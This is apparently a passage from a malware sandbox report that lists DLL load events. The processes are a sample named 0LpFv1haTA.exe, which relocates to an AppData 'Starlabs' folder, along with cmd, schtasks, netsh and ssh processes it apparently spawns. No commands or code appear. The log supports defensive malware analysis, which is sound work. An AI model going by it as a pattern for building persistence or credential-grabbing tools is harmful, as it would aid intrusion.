                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: appresolver.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: bcp47langs.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: slc.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
                      Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
                      Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
                      Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
                      Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: httpapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: avicap32.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: msvfw32.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: slc.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: sppc.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
                      Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: httpapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: avicap32.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: msvfw32.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: gpapi.dll
                      Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
                      Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
                      Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
                      Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
                      Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: libcrypto.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: napinsp.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: pnrpnsp.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: wshbth.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: winrnr.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: kernel.appcore.dll
